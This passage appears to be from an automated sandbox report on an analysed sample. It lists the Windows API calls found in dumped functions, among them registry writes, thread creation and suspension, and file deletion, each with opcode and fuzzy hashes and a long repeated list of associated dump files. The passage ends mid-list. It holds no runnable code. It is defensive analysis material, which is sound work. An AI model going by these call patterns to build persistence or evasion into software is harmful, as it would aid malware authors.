                                                                                                                                                                                  • Associated: 00000013.00000002.546084376.0000000000C80000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.546839461.0000000000CA7000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.546983491.0000000000CB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547070452.0000000000CB3000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547124415.0000000000CB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547241429.0000000000CB8000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547308907.0000000000CB9000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547374773.0000000000CBA000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.560599112.0000000000E62000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.560846932.0000000000E6D000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561528904.0000000000E86000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561572494.0000000000E8E000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561616999.0000000000E90000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561849150.0000000000EB0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561905525.0000000000EB2000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561943838.0000000000EB4000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561982314.0000000000EB8000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562037304.0000000000EBC000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562075350.0000000000EC0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562114548.0000000000EC2000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562134849.0000000000EC4000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562170690.0000000000EC6000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562197141.0000000000ECC000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562239391.0000000000ED0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562311741.0000000000EDA000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562681002.0000000000F03000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.565548193.00000000010D4000.00000020.00020000.sdmp Download File
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Heap$AllocateNameProcessUser$Concurrency::cancel_current_task
                                                                                                                                                                                  • String ID: 152138533219$7b6145
                                                                                                                                                                                  • API String ID: 1471344708-2205202256
                                                                                                                                                                                  • Opcode ID: 640d6cda2263d5e6b9565464dc4ba53288a6e943a6f4d949eacf5940a0e92db4
                                                                                                                                                                                  • Instruction ID: 8653044b3728968cd8a9c461492ac9d2fb7bff1fdfdf4f0df52c723e42972ff0
                                                                                                                                                                                  • Opcode Fuzzy Hash: 640d6cda2263d5e6b9565464dc4ba53288a6e943a6f4d949eacf5940a0e92db4
                                                                                                                                                                                  • Instruction Fuzzy Hash: 51B20771A101145BEF1DFB28CC8979EB776AB82308F10829CE40AA73D6DB359FC58B55
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00C8EF20: Concurrency::cancel_current_task.LIBCPMT ref: 00C8F041
                                                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,00C82820,00000000,00000000,00000000), ref: 00C828F6
                                                                                                                                                                                  • Sleep.KERNEL32(00001388,?,00C89323,?), ref: 00C82903
                                                                                                                                                                                  • SuspendThread.KERNEL32(00000000,?,00C89323,?), ref: 00C8290A
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000013.00000002.546180901.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                  • Associated: 00000013.00000002.546084376.0000000000C80000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.546839461.0000000000CA7000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.546983491.0000000000CB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547070452.0000000000CB3000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547124415.0000000000CB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547241429.0000000000CB8000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547308907.0000000000CB9000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547374773.0000000000CBA000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.560599112.0000000000E62000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.560846932.0000000000E6D000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561528904.0000000000E86000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561572494.0000000000E8E000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561616999.0000000000E90000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561849150.0000000000EB0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561905525.0000000000EB2000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561943838.0000000000EB4000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561982314.0000000000EB8000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562037304.0000000000EBC000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562075350.0000000000EC0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562114548.0000000000EC2000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562134849.0000000000EC4000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562170690.0000000000EC6000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562197141.0000000000ECC000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562239391.0000000000ED0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562311741.0000000000EDA000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562681002.0000000000F03000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.565548193.00000000010D4000.00000020.00020000.sdmp Download File
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Thread$Concurrency::cancel_current_taskCreateSleepSuspend
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1039963361-0
                                                                                                                                                                                  • Opcode ID: 30cb7c1378470101550d3c83eacf2e151135aa06f8f3c16addd436975a0df31d
                                                                                                                                                                                  • Instruction ID: a20c7518103583a203dcb1eab0dfb74734cdf075bb1e622b515b90fa94684706
                                                                                                                                                                                  • Opcode Fuzzy Hash: 30cb7c1378470101550d3c83eacf2e151135aa06f8f3c16addd436975a0df31d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5F410631210148ABEF1CEF28CC89BDE3B96EF46319F608618F955972D6C735D9C18B58
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000001,?,00000000,00000001,?), ref: 00C83DD1
                                                                                                                                                                                  • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,?), ref: 00C83DF9
                                                                                                                                                                                  • RegCloseKey.KERNEL32(?), ref: 00C83E02
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000013.00000002.546180901.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                  • Associated: 00000013.00000002.546084376.0000000000C80000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.546839461.0000000000CA7000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.546983491.0000000000CB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547070452.0000000000CB3000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547124415.0000000000CB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547241429.0000000000CB8000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547308907.0000000000CB9000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547374773.0000000000CBA000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.560599112.0000000000E62000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.560846932.0000000000E6D000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561528904.0000000000E86000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561572494.0000000000E8E000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561616999.0000000000E90000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561849150.0000000000EB0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561905525.0000000000EB2000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561943838.0000000000EB4000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561982314.0000000000EB8000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562037304.0000000000EBC000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562075350.0000000000EC0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562114548.0000000000EC2000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562134849.0000000000EC4000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562170690.0000000000EC6000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562197141.0000000000ECC000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562239391.0000000000ED0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562311741.0000000000EDA000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562681002.0000000000F03000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.565548193.00000000010D4000.00000020.00020000.sdmp Download File
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3677997916-0
                                                                                                                                                                                  • Opcode ID: 91a55a40f9a08b98828bc244bdd64bdb02f3fd750cbe6be7c56d0569f946716f
                                                                                                                                                                                  • Instruction ID: 108f0d31888b41e21e5ec9926922ffabca72598e9a57b2c0dbac52bc6a01f6c8
                                                                                                                                                                                  • Opcode Fuzzy Hash: 91a55a40f9a08b98828bc244bdd64bdb02f3fd750cbe6be7c56d0569f946716f
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9031E571200148AFEB18DF24CC45BEE7B69EB85708F10425CFA5597281D775DF86CBA4
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000013.00000002.546180901.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                  • Associated: 00000013.00000002.546084376.0000000000C80000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.546839461.0000000000CA7000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.546983491.0000000000CB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547070452.0000000000CB3000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547124415.0000000000CB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547241429.0000000000CB8000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547308907.0000000000CB9000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547374773.0000000000CBA000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.560599112.0000000000E62000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.560846932.0000000000E6D000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561528904.0000000000E86000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561572494.0000000000E8E000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561616999.0000000000E90000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561849150.0000000000EB0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561905525.0000000000EB2000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561943838.0000000000EB4000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561982314.0000000000EB8000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562037304.0000000000EBC000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562075350.0000000000EC0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562114548.0000000000EC2000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562134849.0000000000EC4000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562170690.0000000000EC6000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562197141.0000000000ECC000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562239391.0000000000ED0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562311741.0000000000EDA000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562681002.0000000000F03000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.565548193.00000000010D4000.00000020.00020000.sdmp Download File
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Heap$AllocateProcess$NameUser
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3872215182-0
                                                                                                                                                                                  • Opcode ID: f036bdcaf696f2bbb1ed08032c25505f7ed1f9cb21d631da68fab75857753e7a
                                                                                                                                                                                  • Instruction ID: eeac5112c06814c30c27a4d93c53adcb881851a034074f53dc57d34e0eca931a
                                                                                                                                                                                  • Opcode Fuzzy Hash: f036bdcaf696f2bbb1ed08032c25505f7ed1f9cb21d631da68fab75857753e7a
                                                                                                                                                                                  • Instruction Fuzzy Hash: ED31D731E00108ABEF14F7A8DC45FDE7779EF45304F604165F511A71C1EB35694587A9
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetNativeSystemInfo.KERNEL32(?), ref: 00C84163
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000013.00000002.546180901.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                  • Associated: 00000013.00000002.546084376.0000000000C80000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.546839461.0000000000CA7000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.546983491.0000000000CB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547070452.0000000000CB3000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547124415.0000000000CB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547241429.0000000000CB8000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547308907.0000000000CB9000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547374773.0000000000CBA000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.560599112.0000000000E62000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.560846932.0000000000E6D000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561528904.0000000000E86000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561572494.0000000000E8E000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561616999.0000000000E90000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561849150.0000000000EB0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561905525.0000000000EB2000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561943838.0000000000EB4000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561982314.0000000000EB8000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562037304.0000000000EBC000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562075350.0000000000EC0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562114548.0000000000EC2000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562134849.0000000000EC4000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562170690.0000000000EC6000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562197141.0000000000ECC000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562239391.0000000000ED0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562311741.0000000000EDA000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562681002.0000000000F03000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.565548193.00000000010D4000.00000020.00020000.sdmp Download File
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InfoNativeSystem
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1721193555-0
                                                                                                                                                                                  • Opcode ID: e055640507d1dffb8b4b9bc1858fedd195470feaf0c90af226af3537e0df373d
                                                                                                                                                                                  • Instruction ID: ee2aa011664ceac70f912331589c4c5cd6811e3e42831dad9cd6d3b5f7f3658c
                                                                                                                                                                                  • Opcode Fuzzy Hash: e055640507d1dffb8b4b9bc1858fedd195470feaf0c90af226af3537e0df373d
                                                                                                                                                                                  • Instruction Fuzzy Hash: F9713971D092199BEB28EBA8EC497ADB7B4EB51318F50039AEC04D7291E7758EC087C5
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • RegCreateKeyExA.KERNEL32(80000001,?,00000000,00000000,00000000,0002001F,00000000,?,00000000), ref: 00C83EF1
                                                                                                                                                                                  • RegSetValueExA.KERNEL32(?,?,00000000,00000001,?,?), ref: 00C83F3E
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000013.00000002.546180901.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                  • Associated: 00000013.00000002.546084376.0000000000C80000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.546839461.0000000000CA7000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.546983491.0000000000CB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547070452.0000000000CB3000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547124415.0000000000CB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547241429.0000000000CB8000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547308907.0000000000CB9000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547374773.0000000000CBA000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.560599112.0000000000E62000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.560846932.0000000000E6D000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561528904.0000000000E86000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561572494.0000000000E8E000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561616999.0000000000E90000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561849150.0000000000EB0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561905525.0000000000EB2000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561943838.0000000000EB4000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561982314.0000000000EB8000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562037304.0000000000EBC000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562075350.0000000000EC0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562114548.0000000000EC2000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562134849.0000000000EC4000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562170690.0000000000EC6000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562197141.0000000000ECC000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562239391.0000000000ED0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562311741.0000000000EDA000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562681002.0000000000F03000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.565548193.00000000010D4000.00000020.00020000.sdmp Download File
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CreateValue
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2259555733-0
                                                                                                                                                                                  • Opcode ID: 19f28be056211c2087114ad903dbaad04157e4eec206fe76eab91a22562caa5c
                                                                                                                                                                                  • Instruction ID: 98d8cb641d514d6131b95a1c23de7e3d74de1c6d3128b2049c6a6b425515c304
                                                                                                                                                                                  • Opcode Fuzzy Hash: 19f28be056211c2087114ad903dbaad04157e4eec206fe76eab91a22562caa5c
                                                                                                                                                                                  • Instruction Fuzzy Hash: AA41F330210148BFEB18DF68CC89B9E7B76EB45708F608218FE15962D5D775EA81CB98
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • DeleteFileW.KERNEL32(?,?,00C92752,?), ref: 00C9764D
                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 00C9765E
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000013.00000002.546180901.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                  • Associated: 00000013.00000002.546084376.0000000000C80000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.546839461.0000000000CA7000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.546983491.0000000000CB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547070452.0000000000CB3000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547124415.0000000000CB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547241429.0000000000CB8000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547308907.0000000000CB9000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547374773.0000000000CBA000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.560599112.0000000000E62000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.560846932.0000000000E6D000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561528904.0000000000E86000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561572494.0000000000E8E000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561616999.0000000000E90000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561849150.0000000000EB0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561905525.0000000000EB2000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561943838.0000000000EB4000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561982314.0000000000EB8000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562037304.0000000000EBC000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562075350.0000000000EC0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562114548.0000000000EC2000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562134849.0000000000EC4000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562170690.0000000000EC6000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562197141.0000000000ECC000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562239391.0000000000ED0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562311741.0000000000EDA000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562681002.0000000000F03000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.565548193.00000000010D4000.00000020.00020000.sdmp Download File
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: DeleteFile__dosmaperr
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1911827773-0
                                                                                                                                                                                  • Opcode ID: aa7ac905567ba412d29ff1b81722d6451ec5df8cbc3e04f914a6110d4d2c3744
                                                                                                                                                                                  • Instruction ID: cc668a155cd2be30fb1450351a4dba6d1055c4a974e4f837fd5261f303064fb8
                                                                                                                                                                                  • Opcode Fuzzy Hash: aa7ac905567ba412d29ff1b81722d6451ec5df8cbc3e04f914a6110d4d2c3744
                                                                                                                                                                                  • Instruction Fuzzy Hash: 58D01232319608678F502BF5BD0CA1E3F5CAB823787140765F93DC65A0DF35C9519550
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000013.00000002.546180901.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                  • Associated: 00000013.00000002.546084376.0000000000C80000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.546839461.0000000000CA7000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.546983491.0000000000CB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547070452.0000000000CB3000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547124415.0000000000CB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547241429.0000000000CB8000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547308907.0000000000CB9000.00000002.00020000.sdmp Download File
